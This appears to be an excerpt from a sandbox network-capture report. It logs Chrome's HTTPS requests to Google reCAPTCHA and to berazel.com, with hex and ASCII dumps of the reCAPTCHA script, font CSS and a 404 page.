                                                                                                                          2024-12-19 16:08:14 UTC1390INData Raw: 72 73 65 28 62 29 7d 63 61 74 63 68 28 65 29 7b 70 2e 67 3d 7b 7d 7d 46 28 28 28 50 28 28 50 28 28 4c 28 70 2c 33 31 30 2c 28 4c 28 70 2c 28 28 28 50 28 66 75 6e 63 74 69 6f 6e 28 65 2c 47 2c 58 2c 66 2c 54 2c 79 2c 68 2c 52 2c 61 2c 77 2c 49 2c 6d 29 7b 66 75 6e 63 74 69 6f 6e 20 4e 28 6e 2c 75 29 7b 66 6f 72 28 3b 52 3c 6e 3b 29 61 7c 3d 64 28 65 29 3c 3c 52 2c 52 2b 3d 38 3b 72 65 74 75 72 6e 20 75 3d 28 52 2d 3d 6e 2c 61 29 26 28 31 3c 3c 6e 29 2d 31 2c 61 3e 3e 3d 6e 2c 75 7d 66 6f 72 28 49 3d 28 79 3d 28 66 3d 28 47 3d 4a 28 65 29 2c 52 3d 61 3d 30 2c 4e 28 33 29 7c 30 29 2b 31 2c 6d 3d 4e 28 35 29 2c 30 29 2c 77 3d 5b 5d 2c 30 29 3b 79 3c 6d 3b 79 2b 2b 29 54 3d 4e 28 31 29 2c 77 2e 70 75 73 68 28 54 29 2c 49 2b 3d 54 3f 30 3a 31 3b 66 6f 72 28 79
                                                                                                                          Data Ascii: rse(b)}catch(e){p.g={}}F(((P((P((L(p,310,(L(p,(((P(function(e,G,X,f,T,y,h,R,a,w,I,m){function N(n,u){for(;R<n;)a|=d(e)<<R,R+=8;return u=(R-=n,a)&(1<<n)-1,a>>=n,u}for(I=(y=(f=(G=J(e),R=a=0,N(3)|0)+1,m=N(5),0),w=[],0);y<m;y++)T=N(1),w.push(T),I+=T?0:1;for(y
                                                                                                                          2024-12-19 16:08:14 UTC1390INData Raw: 3d 28 47 5b 47 5b 33 35 33 5d 3d 65 2e 4f 5b 33 35 33 5d 2c 33 32 36 5d 3d 65 2e 4f 5b 33 32 36 5d 2c 47 29 7d 65 6c 73 65 20 4c 28 65 2c 32 31 32 2c 65 2e 4b 29 7d 2c 28 4c 28 28 4c 28 70 2c 28 50 28 66 75 6e 63 74 69 6f 6e 28 65 2c 47 2c 58 2c 66 29 7b 4c 28 65 2c 28 58 3d 28 47 3d 28 66 3d 4a 28 65 29 2c 4a 29 28 65 29 2c 4a 28 65 29 29 2c 47 3d 74 28 47 2c 65 29 2c 66 3d 74 28 66 2c 65 29 2c 58 29 2c 66 20 69 6e 20 47 7c 30 29 7d 2c 28 4c 28 70 2c 28 50 28 66 75 6e 63 74 69 6f 6e 28 65 2c 47 2c 58 2c 66 29 7b 4c 28 65 2c 28 66 3d 74 28 28 58 3d 28 47 3d 28 66 3d 28 58 3d 4a 28 65 29 2c 4a 28 65 29 29 2c 4a 28 65 29 29 2c 74 28 58 2c 65 29 29 2c 66 29 2c 65 29 2c 47 29 2c 58 5b 66 5d 29 7d 2c 28 4c 28 70 2c 28 50 28 28 50 28 66 75 6e 63 74 69 6f 6e 28
                                                                                                                          Data Ascii: =(G[G[353]=e.O[353],326]=e.O[326],G)}else L(e,212,e.K)},(L((L(p,(P(function(e,G,X,f){L(e,(X=(G=(f=J(e),J)(e),J(e)),G=t(G,e),f=t(f,e),X),f in G|0)},(L(p,(P(function(e,G,X,f){L(e,(f=t((X=(G=(f=(X=J(e),J(e)),J(e)),t(X,e)),f),e),G),X[f])},(L(p,(P((P(function(
                                                                                                                          2024-12-19 16:08:14 UTC1390INData Raw: 2c 79 2c 68 29 7b 66 6f 72 28 79 3d 28 58 3d 74 28 31 33 32 2c 28 68 3d 28 54 3d 4a 28 65 29 2c 72 6a 28 65 29 29 2c 47 3d 22 22 2c 65 29 29 2c 58 2e 6c 65 6e 67 74 68 29 2c 66 3d 30 3b 68 2d 2d 3b 29 66 3d 28 28 66 7c 30 29 2b 28 72 6a 28 65 29 7c 30 29 29 25 79 2c 47 2b 3d 57 5b 58 5b 66 5d 5d 3b 4c 28 65 2c 54 2c 47 29 7d 29 2c 70 2c 32 35 30 29 2c 34 33 36 29 2c 30 29 2c 70 29 2c 31 30 32 29 2c 33 32 36 29 2c 5b 32 30 34 38 5d 29 2c 70 29 2c 31 31 33 29 2c 32 34 35 29 2c 51 29 2c 70 29 2c 31 37 31 2c 5b 30 2c 30 2c 30 5d 29 2c 70 29 2c 31 33 37 29 2c 33 35 33 29 2c 5b 5d 29 2c 4c 28 70 2c 37 33 2c 30 29 2c 70 29 2c 36 31 29 2c 70 29 2c 33 37 33 29 2c 70 2e 69 39 3d 30 2c 34 32 31 29 2c 5b 5d 29 2c 70 29 2c 36 35 29 2c 31 31 31 29 29 2c 32 34 30 29 29
                                                                                                                          Data Ascii: ,y,h){for(y=(X=t(132,(h=(T=J(e),rj(e)),G="",e)),X.length),f=0;h--;)f=((f|0)+(rj(e)|0))%y,G+=W[X[f]];L(e,T,G)}),p,250),436),0),p),102),326),[2048]),p),113),245),Q),p),171,[0,0,0]),p),137),353),[]),L(p,73,0),p),61),p),373),p.i9=0,421),[]),p),65),111)),240))
                                                                                                                          2024-12-19 16:08:14 UTC1390INData Raw: 31 36 7c 7c 62 3d 3d 32 30 34 7c 7c 62 3d 3d 33 35 33 7c 7c 62 3d 3d 34 32 31 7c 7c 62 3d 3d 37 36 7c 7c 62 3d 3d 31 37 31 7c 7c 62 3d 3d 32 36 38 7c 7c 62 3d 3d 33 32 36 3f 70 2e 4f 5b 62 5d 7c 7c 28 70 2e 4f 5b 62 5d 3d 59 71 28 70 2c 55 2c 62 2c 31 34 32 29 29 3a 70 2e 4f 5b 62 5d 3d 59 71 28 70 2c 55 2c 62 2c 31 31 33 29 7d 62 3d 3d 32 33 32 26 26 28 70 2e 4e 3d 44 28 66 61 6c 73 65 2c 33 32 2c 70 29 2c 70 2e 46 3d 76 6f 69 64 20 30 29 7d 2c 56 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 29 7b 70 2e 59 3d 28 28 70 2e 59 3f 70 2e 59 2b 22 7e 22 3a 22 45 3a 22 29 2b 62 2e 6d 65 73 73 61 67 65 2b 22 3a 22 2b 62 2e 73 74 61 63 6b 29 2e 73 6c 69 63 65 28 30 2c 32 30 34 38 29 7d 2c 49 65 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 2c 55 2c 42 2c 59 29 7b 71 28 28 28
                                                                                                                          Data Ascii: 16||b==204||b==353||b==421||b==76||b==171||b==268||b==326?p.O[b]||(p.O[b]=Yq(p,U,b,142)):p.O[b]=Yq(p,U,b,113)}b==232&&(p.N=D(false,32,p),p.F=void 0)},V=function(p,b){p.Y=((p.Y?p.Y+"~":"E:")+b.message+":"+b.stack).slice(0,2048)},Ie=function(p,b,U,B,Y){q(((
                                                                                                                          2024-12-19 16:08:14 UTC1390INData Raw: 31 32 38 29 3a 62 5b 59 2b 2b 5d 3d 42 3e 3e 31 32 7c 32 32 34 2c 62 5b 59 2b 2b 5d 3d 42 3e 3e 36 26 36 33 7c 31 32 38 29 2c 62 5b 59 2b 2b 5d 3d 42 26 36 33 7c 31 32 38 29 3b 72 65 74 75 72 6e 20 62 7d 2c 61 65 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 2c 55 2c 42 2c 59 2c 72 29 7b 69 66 28 21 62 2e 59 29 7b 62 2e 49 2b 2b 3b 74 72 79 7b 66 6f 72 28 72 3d 28 42 3d 28 59 3d 62 2e 4b 2c 76 6f 69 64 20 30 29 2c 30 29 3b 2d 2d 70 3b 29 74 72 79 7b 69 66 28 28 55 3d 76 6f 69 64 20 30 2c 62 29 2e 73 29 42 3d 7a 4e 28 62 2c 62 2e 73 29 3b 65 6c 73 65 7b 69 66 28 72 3d 74 28 32 31 32 2c 62 29 2c 72 3e 3d 59 29 62 72 65 61 6b 3b 42 3d 28 55 3d 4a 28 28 4c 28 62 2c 31 32 35 2c 72 29 2c 62 29 29 2c 74 28 55 2c 62 29 29 7d 42 26 26 42 5b 68 34 5d 26 32 30 34 38 3f 42
                                                                                                                          Data Ascii: 128):b[Y++]=B>>12|224,b[Y++]=B>>6&63|128),b[Y++]=B&63|128);return b},ae=function(p,b,U,B,Y,r){if(!b.Y){b.I++;try{for(r=(B=(Y=b.K,void 0),0);--p;)try{if((U=void 0,b).s)B=zN(b,b.s);else{if(r=t(212,b),r>=Y)break;B=(U=J((L(b,125,r),b)),t(U,b))}B&&B[h4]&2048?B
                                                                                                                          2024-12-19 16:08:14 UTC1390INData Raw: 62 2e 57 2c 70 28 66 75 6e 63 74 69 6f 6e 28 29 7b 46 28 74 72 75 65 2c 62 2c 74 72 75 65 29 7d 29 3b 62 72 65 61 6b 7d 7d 72 65 74 75 72 6e 20 55 7d 2c 4f 47 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 29 7b 28 62 2e 70 75 73 68 28 70 5b 30 5d 3c 3c 32 34 7c 70 5b 31 5d 3c 3c 31 36 7c 70 5b 32 5d 3c 3c 38 7c 70 5b 33 5d 29 2c 62 2e 70 75 73 68 28 70 5b 34 5d 3c 3c 32 34 7c 70 5b 35 5d 3c 3c 31 36 7c 70 5b 36 5d 3c 3c 38 7c 70 5b 37 5d 29 2c 62 29 2e 70 75 73 68 28 70 5b 38 5d 3c 3c 32 34 7c 70 5b 39 5d 3c 3c 31 36 7c 70 5b 31 30 5d 3c 3c 38 7c 70 5b 31 31 5d 29 7d 2c 5a 3d 7b 70 61 73 73 69 76 65 3a 74 72 75 65 2c 63 61 70 74 75 72 65 3a 74 72 75 65 7d 2c 7a 4e 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 29 7b 72 65 74 75 72 6e 28 62 3d 62 2e 63 72 65 61 74 65 28
                                                                                                                          Data Ascii: b.W,p(function(){F(true,b,true)});break}}return U},OG=function(p,b){(b.push(p[0]<<24|p[1]<<16|p[2]<<8|p[3]),b.push(p[4]<<24|p[5]<<16|p[6]<<8|p[7]),b).push(p[8]<<24|p[9]<<16|p[10]<<8|p[11])},Z={passive:true,capture:true},zN=function(p,b){return(b=b.create(


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.1649740172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:14 UTC862OUTGET /recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                          Referer: https://berazel.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:08:15 UTC1161INHTTP/1.1 200 OK
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                          Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:14 GMT
                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-YXjo0mFiJJPN1r8u1pZ_Tw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-12-19 16:08:15 UTC229INData Raw: 31 65 31 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 74 69 74 6c 65 3e 72 65 43 41 50 54 43 48 41 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2f 2a 20 63
                                                                                                                          Data Ascii: 1e14<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>reCAPTCHA</title><style type="text/css">/* c
                                                                                                                          2024-12-19 16:08:15 UTC1390INData Raw: 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 32 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 41 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30 2d 32 44 46 46 2c 20 55 2b 41 36
                                                                                                                          Data Ascii: yrillic-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A6
                                                                                                                          2024-12-19 16:08:15 UTC1390INData Raw: 32 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 47 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 42 41 2c 20 55 2b 30 32 42 44 2d 30 32 43 35 2c 20 55 2b 30 32 43 37 2d 30 32 43 43 2c 20 55 2b 30
                                                                                                                          Data Ascii: 20AB;}/* latin-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7GxKOzY.woff2) format('woff2'); unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+0
                                                                                                                          2024-12-19 16:08:15 UTC1390INData Raw: 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 43 42 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 31 46 30 30 2d 31 46 46 46 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a
                                                                                                                          Data Ascii: font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2) format('woff2'); unicode-range: U+1F00-1FFF;}/* greek */@font-face { font-family: 'Roboto'; font-style: normal; font-weight:
                                                                                                                          2024-12-19 16:08:15 UTC1390INData Raw: 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 30 30 30 2d 30 30 46 46 2c 20 55 2b 30 31 33 31 2c 20 55 2b 30 31 35 32 2d 30 31 35 33 2c 20 55 2b 30 32 42 42 2d 30 32 42 43 2c 20 55 2b 30 32 43 36 2c 20 55 2b 30 32 44 41 2c 20 55 2b 30 32 44 43 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c 20 55 2b 32 30 30 30 2d 32 30 36 46 2c 20 55 2b 32 30 41 43 2c 20 55 2b 32 31 32 32 2c 20 55 2b 32 31 39 31 2c 20 55 2b 32 31 39 33 2c 20 55 2b 32 32 31 32 2c 20 55 2b 32 32 31 35 2c 20 55 2b 46 45 46 46 2c 20 55 2b 46 46 46 44 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20
                                                                                                                          Data Ascii: format('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face { font-family:
                                                                                                                          2024-12-19 16:08:15 UTC1390INData Raw: 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74 66 43 78 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 32 2d 30 31 30 33 2c 20 55 2b 30 31 31 30 2d 30 31 31 31 2c 20 55 2b 30 31 32 38 2d 30 31 32 39 2c 20 55 2b 30 31 36 38 2d 30 31 36 39 2c 20 55 2b 30 31 41 30 2d 30 31 41 31 2c 20 55 2b 30 31 41 46 2d 30 31 42 30 2c 20 55 2b 30 33 30 30 2d 30 33 30 31 2c 20 55 2b 30 33 30 33 2d 30 33 30 34 2c 20 55 2b 30 33 30 38 2d 30 33 30 39 2c 20 55 2b 30 33 32 33 2c 20 55 2b 30 33 32 39 2c 20 55 2b 31 45 41 30 2d 31 45 46 39 2c 20 55 2b 32 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f
                                                                                                                          Data Ascii: m/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfCxc4EsA.woff2) format('woff2'); unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */
                                                                                                                          2024-12-19 16:08:15 UTC529INData Raw: 41 36 6e 5f 68 4b 4d 61 5f 59 37 55 70 46 79 41 33 37 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 22 20 6e 6f 6e 63 65 3d 22 59 58 6a 6f 30 6d 46 69 4a 4a 50 4e 31 72 38 75 31 70 5a 5f 54 77 22 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 2d 74 6f 6b 65 6e 22 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 59 58 6a 6f 30 6d 46 69 4a 4a 50 4e 31 72 38 75 31 70 5a 5f 54 77 22 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 72 65 63 61 70 74 63 68 61 2e 66 72 61 6d 65 2e 4d 61 69 6e 2e 69 6e 69 74 28 22 5b 5c 78 32
                                                                                                                          Data Ascii: A6n_hKMa_Y7UpFyA37/recaptcha__en.js" nonce="YXjo0mFiJJPN1r8u1pZ_Tw"> </script></head><body><input type="hidden" id="recaptcha-token"><script type="text/javascript" nonce="YXjo0mFiJJPN1r8u1pZ_Tw"> recaptcha.frame.Main.init("[\x2
                                                                                                                          2024-12-19 16:08:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.2.1649739151.106.103.1554437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:16 UTC598OUTGET /favicon.ico HTTP/1.1
                                                                                                                          Host: berazel.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://berazel.com/wellness/south/index
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:08:17 UTC576INHTTP/1.1 404 Not Found
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                          pragma: no-cache
                                                                                                                          content-type: text/html
                                                                                                                          content-length: 1251
                                                                                                                          date: Thu, 19 Dec 2024 16:08:17 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          platform: hostinger
                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                          x-xss-protection: 1; mode=block
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                          2024-12-19 16:08:17 UTC792INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                                                          2024-12-19 16:08:17 UTC459INData Raw: 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75
                                                                                                                          Data Ascii: "color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Prou


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.2.1649741172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:17 UTC859OUTPOST /recaptcha/api2/reload?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 9204
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
